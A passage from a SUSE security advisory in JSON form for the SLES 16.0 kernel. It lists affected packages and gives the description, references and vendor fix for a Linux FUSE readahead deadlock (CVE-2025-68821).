"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end()).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68821",
"url": "https://www.suse.com/security/cve/CVE-2025-68821"
},
{
"category": "external",
"summary": "SUSE Bug 1256667 for CVE-2025-68821",
"url": "https://bugzilla.suse.com/1256667"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
